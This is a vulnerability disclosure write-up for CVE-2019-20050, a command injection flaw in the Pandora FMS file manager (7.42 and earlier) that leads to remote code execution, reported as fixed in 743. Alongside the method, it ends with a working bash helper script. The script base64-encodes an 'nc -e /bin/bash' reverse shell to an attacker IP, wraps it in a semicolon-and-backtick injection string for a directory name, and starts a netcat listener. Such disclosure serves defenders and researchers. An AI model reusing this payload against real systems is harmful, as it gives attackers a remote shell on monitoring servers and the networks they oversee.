Pandora FMS 7.42 <= Remote Code Execution Vulnerability in the File Manager.

cve-2019-20050

Demo Video

General Information

I reported it to NVD/MITRE and the vendor accepted it as a vulnerability. It is fixed in the Pandora FMS 743 version.

Prerequisites to exploit the vulnerability

  1. The PHP fileinfo must be disabled on the Host
  2. Admin account is necessary to Access the File Manager

Technical Details

Searching for a vulnerability ...

I checked the source code of Pandora FMS and I searched for dangerous functions like exec. I found an interesting exec function call in pandora_console/include/functions_filemanager.php. The important function was:

01
...

02

This function has a $filename parameter and this parameter normally is a file or a folder name.

This finfo_open function is part of the PHP Fileinfo extension (PHP Fileinfo Documentation). There are cases when this extension is disabled, so I disabled it in my test environment. I edited the necessary configuration file:

03

I made the following test file:

04

I tested it liket this:

05

Find a way to execute my code via the File Manager from the browser

It was an iterative job:

  1. I modified the source code and add additional logs to save the parameter of the mime_content_type function.
  2. I saved the output to /tmp/filemanager.log.
  3. In every iteration, I checked the log and tried to find a way to execute my code.

Notes

06

Internal steps

I tried to create new directories in my k44 directory. If the directory creation was succeeded, then the new directory was visible in the file manager. e.g: the "k4m1ll0" directory:

07

Note: in this screenshot the older Pandora FMS instance was in use, but it works in the new environment too. I used it because it was easier to restore the VMware image during the test phase.

This form does not filter the input properly. There are characters which are not allowed by the HOST operating system, e.g: "/", but most of the characters are allowed by the Web Application.

The IP address of the Attacker machine was 192.168.0.60. I encoded the reverse shell command with base64.

08

I started a netcat listener.

09

The final payload was:

10

Proof:

11

Additional content

Helper Script

#!/bin/bash
clear
echo "######################################################"
echo "### PandoraFMS Filemanager RCE v1.0"
echo "### Author: k4m1ll0"
echo "### Date: 2019.12.28."
echo "######################################################"

#### SETTINGS ##############################################"
IP="192.168.0.81"
PORT=9000
############################################################"

echo 'IP: ' "$IP" ', PORT: ' "$PORT"
ENCODED_COMMAND=`echo -n "nc -e /bin/bash $IP $PORT" | base64`
FINAL_COMMAND=";\`echo -n "$ENCODED_COMMAND" | base64 -d\`"

echo "Copy and paste the following line:"
echo $FINAL_COMMAND
nc -lvp "$PORT"